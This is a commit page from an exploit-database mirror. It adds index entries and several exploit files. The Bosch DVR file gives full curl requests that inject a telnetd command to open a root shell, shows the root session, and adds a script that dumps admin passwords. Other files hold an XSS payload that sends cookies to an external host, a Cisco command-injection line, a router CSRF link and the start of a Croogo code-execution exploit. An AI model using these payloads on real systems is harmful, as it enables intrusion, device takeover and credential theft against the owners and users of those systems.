bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_16_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-16 04:44:33 +00:00
parent d6656d50cd
commit 478ee155fa
18 changed files with 1540 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -31197,6 +31197,7 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
@ -31474,3 +31475,19 @@ id,file,description,date,author,platform,type,port
34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0 34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0
34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0 34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0
34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal Vulnerability",2010-11-02,"Luke Taylor",multiple,remote,0 34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal Vulnerability",2010-11-02,"Luke Taylor",multiple,remote,0
34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition Vulnerability",2010-11-02,halfdog,linux,local,0
34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager <= 8.0 Invalid Argument Privilege Escalation Vulnerability",2010-11-03,"Knud Erik Hjgaard",hardware,local,0
34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x SQL Error Information Disclosure Vulnerability",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0
34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0
34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
34969,platforms/hardware/webapps/34969.html,"Tenda A32 Router - CSRF Vulnerability",2014-10-14,zixian,hardware,webapps,0
34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0
34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 'pdaview.asp' Cross Site Scripting Vulnerability",2010-11-05,"Wesley Kerfoot",asp,webapps,0
34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0
34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress 'handler_image.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0
34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0

Can't render this file because it is too large.

11
platforms/asp/webapps/34971.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44689/info
Angel Learning Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Angel Learning Management System 7.3 is vulnerable; other versions may also be affected.
https://[Angel
Root]/portal/pdaview.asp?p_TS=85546&p_id=InTouchMail&pdaback="<script>document.location="http://www.example.com/pentest/pwnt.php?cookie="%2bdocument.cookie;</script>?p_TS=
85546

11
platforms/hardware/local/34954.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44672/info
Cisco Unified Communications Manager is prone to a local privilege-escalation vulnerability.
Attackers can exploit this issue to gain administrative access to the affected device and execute arbitrary code with superuser privileges. Successful exploits will lead to the complete compromise of the device.
This issue is tracked by Cisco Bug ID CSCti52041 and CSCti74930.
Cisco Unified Communications Manager 6, 7, and 8 are vulnerable.
/usr/local/cm/bin/pktCap_protectData -i";id"

260
platforms/hardware/webapps/34956.txt Executable file
View file

@ -0,0 +1,260 @@
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2014-10-01 ]
###############################################################################
# [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities #
###############################################################################
#
# Device: "The Bosch Video Recorder 630/650 Series is an 8/16
# channel digital recorder that uses the latest H.264
# compression technology. With the supplied PC
# software and built-in web server, the 630/650 Series is
# a fully integrated, stand-alone video management
# solution that's ready to go, straight out of the box.
# Available with a variety of storage capacities, the
# 630/650 Series features a highly reliable embedded
# design that minimizes maintenance and reduces
# operational costs. The recorder is also available with a
# built-in DVD writer."
#
# Vendor: http://www.boschsecurity.com/
# Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf
# DVR 670 http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf
#
# Software Download:
# http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip
# http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip
#
# Timeline: 2014-10-01 Vulnerability discovered
# 2014-10-03 1 Contact with vendor - No response
# 2014-10-14 Published
#
#
###################################################################
# Gaining Root Shell Access [1]:
POST /Net_work.xml HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/network.html
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
Content-Length: 1274
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: MosaLanguage=0; session=
<NETWORK_SETTING>
<DHCP>0</DHCP>
<DHCPIP>10.11.219.2</DHCPIP>
<DHCPMASK>255.255.255.0</DHCPMASK>
<DHCPGW>10.11.219.1</DHCPGW>
<DHCPDNS1>0.0.0.0</DHCPDNS1>
<DHCPDNS2>0.0.0.0</DHCPDNS2>
<IP>10.11.219.2</IP>
<MASK>255.255.255.0</MASK>
<GW>10.11.219.1</GW>
<DNS1>0.0.0.0</DNS1>
<DNS2>0.0.0.0</DNS2>
<HTTP_PORT>80</HTTP_PORT>
<BANDWIDTH>0</BANDWIDTH>
<DDNS_SERVER>1</DDNS_SERVER>
<DYNDNS_HOST>wxss</DYNDNS_HOST>
<DYNDNS_USER>ffl</DYNDNS_USER>
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>
<TZO_HOST></TZO_HOST>
<TZO_MAIL></TZO_MAIL>
<TZO_KEY></TZO_KEY>
<SITE_HOST>sdads</SITE_HOST>
<SITE_PWD>dsadsd</SITE_PWD>
<SITE_RECORDID>sdasdas</SITE_RECORDID>
<SITE_FQDN>dasdas</SITE_FQDN>
<ALARM_ON>0</ALARM_ON>
<MOTION>0</MOTION>
<DISK_FAIL>0</DISK_FAIL>
<DISK_FULL>0</DISK_FULL>
<FAN_FAIL>0</FAN_FAIL>
<DISK_TEMP>0</DISK_TEMP>
<ADMIN_PW>0</ADMIN_PW>
<VIDEO_LOSS>0</VIDEO_LOSS>
<POWER>0</POWER>
<SENDER>0</SENDER>
<SMTP></SMTP>
<SMTP_PORT>25</SMTP_PORT>
<SSL>0</SSL>
<USERNAME></USERNAME>
<PWD></PWD>
<SENDER_MAIL></SENDER_MAIL>
<SUBJECT></SUBJECT>
<MAIL_1></MAIL_1>
<MAIL_2></MAIL_2>
<MAIL_3></MAIL_3>
<MAIL_TEST>0</MAIL_TEST>
</NETWORK_SETTING>
## PoC:
root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
-b 'MosaLanguage=0; session=' --data-binary $'<NETWORK_SETTING>\x0d\x0a <DHCP>0</DHCP>\x0d\x0a <DHCPIP>10.11.219.2</DHCPIP>\x0d\x0a \
<DHCPMASK>255.255.255.0</DHCPMASK>\x0d\x0a <DHCPGW>10.11.219.1</DHCPGW>\x0d\x0a <DHCPDNS1>0.0.0.0</DHCPDNS1>\x0d\x0a \
<DHCPDNS2>0.0.0.0</DHCPDNS2>\x0d\x0a <IP>10.11.219.2</IP>\x0d\x0a <MASK>255.255.255.0</MASK>\x0d\x0a <GW>10.11.219.1</GW>\x0d\x0a \
<DNS1>0.0.0.0</DNS1>\x0d\x0a <DNS2>0.0.0.0</DNS2>\x0d\x0a <HTTP_PORT>80</HTTP_PORT>\x0d\x0a <BANDWIDTH>0</BANDWIDTH>\x0d\x0a \
<DDNS_SERVER>1</DDNS_SERVER>\x0d\x0a <DYNDNS_HOST>wxss</DYNDNS_HOST>\x0d\x0a <DYNDNS_USER>ffl</DYNDNS_USER>\x0d\x0a \
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>\x0d\x0a <TZO_HOST></TZO_HOST>\x0d\x0a <TZO_MAIL></TZO_MAIL>\x0d\x0a \
<TZO_KEY></TZO_KEY>\x0d\x0a <SITE_HOST>sdads</SITE_HOST>\x0d\x0a <SITE_PWD>dsadsd</SITE_PWD>\x0d\x0a \
<SITE_RECORDID>sdasdas</SITE_RECORDID>\x0d\x0a <SITE_FQDN>dasdas</SITE_FQDN>\x0d\x0a <ALARM_ON>0</ALARM_ON>\x0d\x0a \
<MOTION>0</MOTION>\x0d\x0a <DISK_FAIL>0</DISK_FAIL>\x0d\x0a <DISK_FULL>0</DISK_FULL>\x0d\x0a <FAN_FAIL>0</FAN_FAIL>\x0d\x0a \
<DISK_TEMP>0</DISK_TEMP>\x0d\x0a <ADMIN_PW>0</ADMIN_PW>\x0d\x0a <VIDEO_LOSS>0</VIDEO_LOSS>\x0d\x0a <POWER>0</POWER>\x0d\x0a \
<SENDER>0</SENDER>\x0d\x0a <SMTP></SMTP>\x0d\x0a <SMTP_PORT>25</SMTP_PORT>\x0d\x0a <SSL>0</SSL>\x0d\x0a <USERNAME></USERNAME>\x0d\x0a \
<PWD></PWD>\x0d\x0a <SENDER_MAIL></SENDER_MAIL>\x0d\x0a <SUBJECT></SUBJECT>\x0d\x0a <MAIL_1></MAIL_1>\x0d\x0a <MAIL_2></MAIL_2>\x0d\x0a \
<MAIL_3></MAIL_3>\x0d\x0a <MAIL_TEST>0</MAIL_TEST>\x0d\x0a</NETWORK_SETTING>\x0d\x0a' 'http://10.11.219.2/Net_work.xml'
root@debian:~# telnet 10.11.219.2 30
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
2827 root 228 S telnetd -l/bin/sh -p30
/ # netstat -ltn | grep 30
tcp 0 0 0.0.0.0:30 0.0.0.0:* LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#
###################################################################
# Gaining Root Shell Access (authorization is needed) [2]:
GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/system.html
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: MosaLanguage=0; session=
## PoC:
root@debian:~# curl -i -s -k -X 'GET' \
-H 'Referer: http://10.11.219.2/system.html' \
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
-b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id'
root@debian:~# telnet 10.11.219.2 40
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
2827 root 228 S telnetd -l/bin/sh -p40
/ # netstat -ltn | grep 40
tcp 0 0 0.0.0.0:40 0.0.0.0:* LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#
###################################################################
# Admin Password Disclosure: http://10.11.219.2/User.cgi?cmd=get_user
## PoC Exploit:
#!/bin/bash
x=0;
for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g');
do base64 -d<<<$i; if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi; ((x++)); done
###################################################################
# Sensitive Information Disclosure:
http://10.11.219.2/Config.cgi?cmd=system_info
http://10.11.219.2/System.xml
http://10.11.219.2/Net_work.xml
http://10.11.219.2/webcmd.html
/ # cat /4mosa600/data/Webcmd_help.txt
cmd value (sample)
====================+==========================
blockid | 0 ~ block max // show block info and flag and gop status.
--------------------+-------------------------
disk | // show disk temp.
--------------------+-------------------------
reboot | // restart DVR.
--------------------+-------------------------
remote-info | // socket status.
--------------------+-------------------------
log | 1: System // show system log.
| 2: Record
| 4: Login
| 8: Configure
| 16: Operation
| 31: All
| 63: Service
--------------------+-------------------------
ionly | 1~12 how many frames in a GOP will send to internet
| 0: all I/P-frame (default)
| 1: I only
| 2: IP
| 3: IPP
| 4: IPPP
| ....
| 12: IPPPPPPPPPPP
| others: show current value on DVR.
--------------------+-------------------------
chlink | 0~MKF_CHANNEL // show channel link.
--------------------+-------------------------
bitrate | // show bitrate information.
--------------------+-------------------------
dls | // show about time and DLS message.
--------------------+-------------------------
bmp | // dump bmp file to http://x.x.x.x/vga0.bmp
--------------------+-------------------------
msg | This is bitmap
| bit 0 show encode FPS and Bitrate.
| bit 1 show encode resolution.(dependent bit 1)
| bit 2 show remote client mesage.
| bit 3 show ptz command.
| bit 4 cpu and memory usage..
--------------------+-------------------------
remote-cgi | 0 disable all cgi command.
| 1 show all cgi command to console.
| 2 show cig command if not "login_id"
--------------------+-------------------------

14
platforms/hardware/webapps/34969.html Executable file
View file

@ -0,0 +1,14 @@
# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
When the administrator login, click on the link below? the device will reboot?
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>

239
platforms/ios/webapps/34957.txt Executable file
View file

@ -0,0 +1,239 @@
Document Title:
===============
PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=895
PayPal Security UID: Vxda0S
Video: http://www.vulnerability-lab.com/get_content.php?id=1338
View: https://www.youtube.com/watch?v=RXubXP_r2M4
Release Date:
=============
2014-10-09
Vulnerability Laboratory ID (VL-ID):
====================================
895
Common Vulnerability Scoring System:
====================================
6.2
Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.
PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.
On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.
On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.
(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a security auth protection mechanism bypass vulnerability in the PayPal Inc iOS Mobile Application.
Vulnerability Disclosure Timeline:
==================================
2014-10-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
PayPal Inc
Product: iOS Mobile Application - Banking 4.6.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An auth restriction bypass vulnerability has been discovered in the official PayPal Inc mobile webapplication and api.
The vulnerability allows to bypass a filter or restrction of the online-service to get unauthorized paypal account access.
The security vulnerability is located in the mobile api auth procedure of the paypal online-service. The mobile app api does not
check for already restricted/blocked application accounts. Remote attackers are able to login through the mobile api with paypal
portal restriction to access account information or interact with the compromised account.
If a paypal user tries several times to login with a wrong password/user combination the paypal account will temporarily be closed
for security reasons. When this happens the user needs to answer a secret question to get the account open again. Even if the account
is temporarily closed it is possible to get access to the account via the paypal mobile app client through the API.
The client API checks only if the account exists, the API does not check a part- or full blocking of the account. It is possible for
the blocked user to get access to his paypal account and is able to make transactions and he can send money from the account. The mobile
iPhone / iPad Paypal App does need a security upgrade to ensure that the status of an account is also verified and how the App reacts when
such an event takes place. This would ensure that no one can have access via the mobile client to a blocked account. In the Paypal database
there are several preferences for an account to verify the status of the account. These preferences need to be used to check also the account
status on the mobile client API. There is another exception which drops a push message on iOS devices (iphone & ipad) which refers to the main
paypal website but it is only a temporary solution and no possibility to block account stable.
During the pentest the researcher revealed that he was able to access the blocked test account through the mobile application api. At the end the
researcher was able to interact through the mobile app by easily accessing the information of the paypal account x01445@gmail.com.
The security risk of the auth bypass restriction vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2.
Exploitation of the vulnerability requires a restricted/blocked account of the paypal application without user interaction. Successful exploitation
of the issue results in auth restriction bypass through the official mobile paypal app api.
Vulnerable Service(s):
[+] PayPal Inc
Vulnerable Software(s):
[+] PayPal iOS App (iPhone & iPad) v4.6.0
Vulnerable Module(s):
[+] API
Affected Module(s):
[+] Login Verification (Auth)
Proof of Concept (PoC):
=======================
The auth bypass restriction vulnerability can be exploited by remote attackers without user interaction but with low privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Site: PayPal Inc (www.paypal.com)
Test Account: x01445@gmail.com 01x445@gmail.com
Mobile Client: https://itunes.apple.com/us/app/paypal/id283646709
#1 Manual steps to reproduce the issue with security question
1. Register a regular PayPal account linked to a banking account
2. Go to the login & provoke the ask for security questions after several wrong forced passwords login requests
3. It is also possible to do it when logged into the account and provoke via transaction cancels & co.
4. Now, try to login again and we see the "Security Question" module
5. We switch to our iphone or ipad device and download & install the new paypal mobile application v4.6.0
6. Open the mobile application on your ipad or iphone device and login to your account
Note: The security protection mechanism of the main paypal core application disallows to login
without the verification attempt of the security question module!
7. The application allows the user to login via the mobile paypal app api without auth cancel or sec question popup
8. We login successful!
9. Now, the attacker can handle transactions, send money, request money, add funds, change address or include new cards
10. Successful reproduced!
#2 Manual steps to reproduce the issue without security question
1. Install the application to your iOS device (ipad or iphone)
2. Register a paypal inc user account
3. Solve a transaction and provoke an incident that the account get blocked
4. Now, login to the ios device and start the paypal application
5. Include the blocked login credentials and press the login button
6. The service grants access through the mobile api without processing to drop any exception to prevent the access
Note: Now the attacker is able to request the stored data of the paypal user in the portal even if the
service is restricted accessable. Regular the service must block you like when you login to the portal
but in case of the issue the api grants the access because of missing value check.
Security Video Demonstration Description
The video shows two blocked accounts. The first is the 01x445@gmail.com pp test account and the second is the x01445@gmail.com pp test account.
The first one is nulled and frozen and the second one has also been blocked. The video shows in the first steps both login profiles with are
unsuccessful. After providing to demonstrate that the x01445@gmail.com account is not allowed to access the portal we show how to unauthorized
access the account information even if the service has blocked to login through the main paypal. The researcher demonstrates how to bypass the
restricted account to get access and interact via api.
Reference(s): Links
https://itunes.apple.com/us/app/paypal/id283646709
https://www.paypal.com
Resource(s):
../Paypal Mobile API Auth Bypass Restriction.wmv
Picture(s):
../1.jpg 11.jpg
../1.png
Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure recognition of the validation procedure when
processing to request restriction values through api in the paypal account system.
The same exception that popup for the account 01x445@gmail.com which is nulled needs to
prevent the same problem of the account x01445@gmail.com.
The account system itself should never allow to grant access for an account that has been restricted
in the main service that manages the paypal users. The bug does not only hurt the security policy it
is an infrastructure bug too.
Security Risk:
==============
The security risk of the protection mechanism bypass vulnerability via mobile api is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

7
platforms/linux/local/34953.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44623/info
FUSE fusermount tool is prone to a race-condition vulnerability.
A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system.
http://www.exploit-db.com/sploits/34953.zip

11
platforms/php/webapps/34955.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44674/info
Joomla! is prone to an information-disclosure vulnerability due to an SQL error.
Exploiting this issue can allow attackers to gain access to sensitive information contained in the application's database. Successful exploits may lead to other attacks.
Versions prior to Joomla! 1.5.22 are vulnerable.
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_back.jpg

369
platforms/php/webapps/34958.py Executable file
View file

@ -0,0 +1,369 @@
#!/usr/bin/env python
#
#
# Croogo 2.0.0 Arbitrary PHP Code Execution Exploit
#
#
# Vendor: Fahad Ibnay Heylaal
# Product web page: http://www.croogo.org
# Affected version: 2.0.0
#
# Summary: Croogo is a free, open source, content management system
# for PHP, released under The MIT License. It is powered by CakePHP
# MVC framework.
#
# Desc: Croogo suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper
# verification of uploaded files in '/admin/file_manager/attachments/add'
# script thru the 'data[Attachment][file]' POST parameter and in
# '/admin/file_manager/file_manager/upload' script thru the
# 'data[FileManager][file]' POST parameter. This can be exploited
# to execute arbitrary PHP code by uploading a malicious PHP script
# file that will be stored in '/webroot/uploads/' directory.
#
# Tested on: Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5202
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php
#
# Vendor: http://blog.croogo.org/blog/croogo-210-released
#
#
# 26.07.2014
#
#
version = '5.0.0.251'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@---------------------------------------------------------------@
| |
